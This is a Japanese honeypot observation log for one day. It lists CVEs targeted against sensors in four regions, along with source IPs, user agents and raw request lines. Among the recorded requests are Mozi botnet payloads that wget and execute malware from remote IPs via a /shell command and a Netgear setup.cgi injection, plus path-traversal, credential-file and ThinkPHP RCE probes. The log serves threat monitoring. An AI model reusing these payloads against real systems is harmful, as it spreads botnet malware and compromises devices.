ハニーポット(仮) 観測記録 2021/11/07分です。
特徴
共通
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為
Location:JP
phpMyAdminへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。
Location:US
Atlassian Jira Server/Data Centerの脆弱性(CVE-2021-26086)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
l9exploreによるスキャン行為
/.awsへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:UK
GPONルータの脆弱性を狙うアクセス
Nmap Scripting Engineによるスキャン行為
5[.]188[.]210[.]227に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//120[.]85[.]175[.]101:58207/Mozi.a; chmod 777 Mozi[.]a; /tmp/Mozi.a jaws
Location:SG
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Anarchy99によるスキャン行為
Nmap Scripting Engineによるスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
他
アクセス数推移
JP:総アクセス数:69 (前日比:-280)
US:総アクセス数:69 (前日比:-16)
UK:総アクセス数:61 (前日比:-20)
SG:総アクセス数:73 (前日比:-107)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 13.73.235.21 | United States |
1 | 20.212.53.183 | United States |
1 | 27.115.124.9 | China |
1 | 27.115.124.10 | China |
1 | 27.115.124.100 | China |
5 | 35.153.57.108 | United States |
1 | 42.193.23.161 | China |
1 | 45.83.64.13 | Germany |
4 | 45.125.239.191 | Vietnam |
24 | 45.146.164.110 | Russia |
2 | 67.205.186.154 | United States |
1 | 69.61.242.98 | United States |
3 | 103.19.191.55 | Hong Kong |
1 | 104.248.125.15 | United States |
1 | 128.1.248.26 | United States |
1 | 135.125.246.110 | France |
1 | 135.125.246.189 | France |
1 | 137.184.197.71 | United States |
1 | 137.184.202.162 | United States |
4 | 159.203.18.202 | United States |
1 | 159.223.2.56 | United States |
2 | 161.35.212.57 | United States |
1 | 165.232.86.149 | United States |
1 | 183.136.226.4 | China |
1 | 184.169.242.153 | United States |
2 | 185.254.31.134 | Turkey |
1 | 188.166.12.220 | United States |
2 | 193.3.19.243 | Russia |
1 | 209.17.97.74 | United States |
1 | 209.141.62.185 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
8 | - |
2 | Go-http-client/1.1 |
1 | Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 |
4 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
24 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
22 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | python-requests/2.18.4 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | \x03 | ||
2 | \x16\x03\x01 | ||
1 | \x16\x03\x01\x01C\x01 | ||
1 | \x16\x03\x01\x01\xfa\x01 | ||
22 | GET | /.env | HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau | HTTP/1.1 |
3 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /ab2g | HTTP/1.1 |
1 | GET | /ab2h | HTTP/1.1 |
1 | GET | /config/getuser?index=0 | HTTP/1.1 |
2 | GET | /console/ | HTTP/1.1 |
3 | GET | /favicon.ico | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
2 | GET | /pmd/index.php | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /sitemap.xml | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
2 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
2 | GET | http[:]//18[.]179[.]20[.]5:80/ | HTTP/1.1 |
2 | GET | http[:]//www[.]yagoal[.]online/static/js/index.cc66e94a.js | HTTP/1.1 |
2 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
2 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 13.73.235.21 | United States |
9 | 20.84.83.239 | United States |
1 | 23.146.241.135 | United States |
4 | 37.0.8.101 | Netherlands |
1 | 45.83.65.195 | Germany |
12 | 45.146.164.110 | Russia |
1 | 104.244.76.13 | United States |
1 | 104.248.239.153 | United States |
1 | 128.14.209.162 | United States |
8 | 135.125.217.54 | France |
1 | 137.184.193.174 | United States |
1 | 137.184.197.71 | United States |
1 | 137.184.202.162 | United States |
6 | 137.184.214.146 | United States |
7 | 143.198.136.88 | United States |
1 | 159.223.14.31 | United States |
2 | 167.99.39.23 | United States |
1 | 180.188.251.117 | India |
2 | 185.254.31.134 | Turkey |
2 | 193.3.19.243 | Russia |
1 | 209.17.97.114 | United States |
2 | 209.141.62.185 | United States |
3 | 212.83.8.81 | Russia |
UserAgent一覧
件数 | UserAgent |
---|---|
8 | - |
2 | Go-http-client/1.1 |
1 | Hello, World |
1 | Lkx-Apache2449TraversalPlugin/0.0.1 (+https[:]//leakix[.]net/, +https[:]//twitter[.]com/HaboubiAnis) |
9 | Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
12 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 |
24 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | Mozilla/5.0 (compatible; Baiduspider/2.0; +http[:]//www[.]baidu[.]com/search/spider.html) |
1 | Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2 |
3 | l9explore/1.3.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | \x03 | ||
2 | \x16\x03\x01 | ||
1 | \x16\x03\x01\x01C\x01 | ||
1 | \x16\x03\x01\x01\xfb\x01 | ||
1 | CONNECT | leakix[.]net:443 | HTTP/1.1 |
1 | GET | /.DS_Store | HTTP/1.1 |
1 | GET | /.aws/credentials | HTTP/1.1 |
21 | GET | /.env | HTTP/1.1 |
1 | GET | /.env.bak | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /_profiler/phpinfo | HTTP/1.1 |
1 | GET | /ab2g | HTTP/1.1 |
1 | GET | /ab2h | HTTP/1.1 |
1 | GET | /app/.env | HTTP/1.1 |
1 | GET | /aws.yml | HTTP/1.1 |
1 | GET | /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts | HTTP/1.1 |
1 | GET | /config.js | HTTP/1.1 |
1 | GET | /config/aws.yml | HTTP/1.1 |
2 | GET | /config/getuser?index=0 | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /core/.env | HTTP/1.1 |
1 | GET | /dispatch.asp | HTTP/1.1 |
2 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /frontend_dev.php/$ | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /info.php | HTTP/1.1 |
1 | GET | /owa | HTTP/1.1 |
1 | GET | /phpinfo | HTTP/1.1 |
1 | GET | /phpinfo.php | HTTP/1.1 |
1 | GET | /public/.env | HTTP/1.1 |
1 | GET | /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /user/deposit/700637aa16614eb889664c9c2927d66b | HTTP/1.1 |
1 | GET | /user/deposit/simplii | HTTP/1.1 |
1 | GET | /v2/_catalog | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 5.188.210.227 | Russia |
1 | 23.146.241.135 | United States |
24 | 45.146.164.110 | Russia |
1 | 45.160.78.172 | Argentina |
1 | 46.249.32.69 | Netherlands |
2 | 67.205.186.154 | United States |
1 | 117.223.86.170 | India |
1 | 120.85.175.101 | China |
3 | 123.130.125.67 | China |
1 | 125.45.19.107 | China |
1 | 128.1.248.42 | United States |
2 | 128.199.60.148 | United Kingdom |
1 | 143.110.188.55 | United States |
2 | 157.245.70.127 | United States |
2 | 159.223.109.104 | United States |
1 | 165.22.76.144 | United States |
2 | 167.172.93.97 | United States |
2 | 178.62.59.163 | United States |
5 | 185.53.90.110 | Belize |
2 | 193.3.19.243 | Russia |
1 | 195.154.119.181 | France |
1 | 209.17.97.90 | United States |
3 | 209.141.62.185 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
16 | - |
1 | Firefox |
5 | Go-http-client/1.1 |
1 | Hello, world |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
24 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
3 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
3 | Mozilla/5.0 (compatible; Nmap Scripting Engine; http[:]//nmap[.]org/book/nse.html) |
1 | Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2 |
1 | python-requests/2.18.4 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | \x03 | ||
1 | \x16\x03\x01 | ||
1 | \x16\x03\x01\x01\xfc\x01 | ||
3 | GET | /.env | HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /CSS/Miniweb.css | HTTP/1.1 |
1 | GET | /Portal0000.htm | HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau | HTTP/1.1 |
1 | GET | /__Additional | HTTP/1.1 |
3 | GET | /_ignition/execute-solution | HTTP/1.1 |
5 | GET | /ab2g | HTTP/1.1 |
5 | GET | /ab2h | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=adminisp&psd=adminisp | HTTP/1.0 |
1 | GET | /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd | HTTP/1.1 |
3 | GET | /config/getuser?index=0 | HTTP/1.1 |
2 | GET | /console/ | HTTP/1.1 |
1 | GET | /dispatch.asp | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//120[.]85[.]175[.]101:58207/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
2 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | GET | http[:]//5[.]188[.]210[.]227/echo.php | HTTP/1.1 |
2 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
2 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
5 | PUT | /SDK/webLanguage | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 13.92.170.148 | United States |
1 | 20.55.53.144 | United States |
1 | 27.115.124.43 | China |
2 | 27.115.124.74 | China |
1 | 27.115.124.106 | China |
24 | 45.146.164.110 | Russia |
1 | 69.194.182.218 | United States |
1 | 88.214.57.235 | Germany |
3 | 103.19.191.55 | Hong Kong |
1 | 104.248.125.15 | United States |
1 | 107.189.14.47 | United States |
1 | 113.59.180.40 | South Korea |
1 | 115.220.214.176 | China |
3 | 124.129.5.234 | China |
1 | 125.44.212.49 | China |
1 | 128.14.134.134 | United States |
1 | 135.125.217.54 | France |
2 | 137.184.193.174 | United States |
2 | 137.184.197.91 | United States |
8 | 137.184.214.146 | United States |
1 | 159.89.113.25 | United States |
1 | 183.136.225.9 | China |
4 | 185.163.109.66 | Romania |
1 | 188.166.12.220 | United States |
1 | 190.180.154.81 | Argentina |
1 | 193.3.19.243 | Russia |
1 | 194.127.178.156 | United Kingdom |
1 | 209.17.97.10 | United States |
2 | 209.141.62.185 | United States |
3 | 212.47.244.68 | France |
UserAgent一覧
件数 | UserAgent |
---|---|
14 | - |
1 | Anarchy99 |
3 | Go-http-client/1.1 |
1 | Hello, World |
1 | Mozila/5.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5; rv:59.0.2) Gecko/20100101 Firefox/59.0.2 |
3 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
24 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
16 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | Mozilla/5.0 (compatible; Baiduspider/2.0; +http[:]//www[.]baidu[.]com/search/spider.html) |
1 | Mozilla/5.0 (compatible; Nmap Scripting Engine; http[:]//nmap[.]org/book/nse.html) |
1 | python-requests/2.18.4 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ | HTTP/1.0 | |
1 | \x03 | ||
2 | \x16\x03\x01 | ||
1 | \x16\x03\x01\x01\xfb\x01 | ||
3 | \x16\x03\x01\x02 | ||
1 | CONNECT | www[.]bing[.]com:443 | HTTP/1.1 |
17 | GET | /.env | HTTP/1.1 |
1 | GET | /.well-known/security.txt | HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /CSS/Miniweb.css | HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau | HTTP/1.1 |
3 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=user&psd=user | HTTP/1.0 |
2 | GET | /config/getuser?index=0 | HTTP/1.1 |
2 | GET | /console/ | HTTP/1.1 |
4 | GET | /favicon.ico | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
2 | GET | /pmd/index.php | HTTP/1.1 |
2 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//115[.]220[.]214[.]176:38594/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
2 | GET | /sitemap.xml | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
2 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | GET | http[:]//www[.]bing[.]com/ | HTTP/1.1 |
2 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.1 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
2 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | http[:]//lindsayvinson[.]site/494196acc92909a0563b9facb379e00f6df66d1edd88dcb2cbed73f699596b5097728ebe6399289c70930f2b6e56bd624e81819ed148f1ef2b9ea767b30c1cbeb0cc6ab80b8de2904f597031c2c47ef38c634e4dc80775dcc7b8aaadc607ad86 | HTTP/1.1 |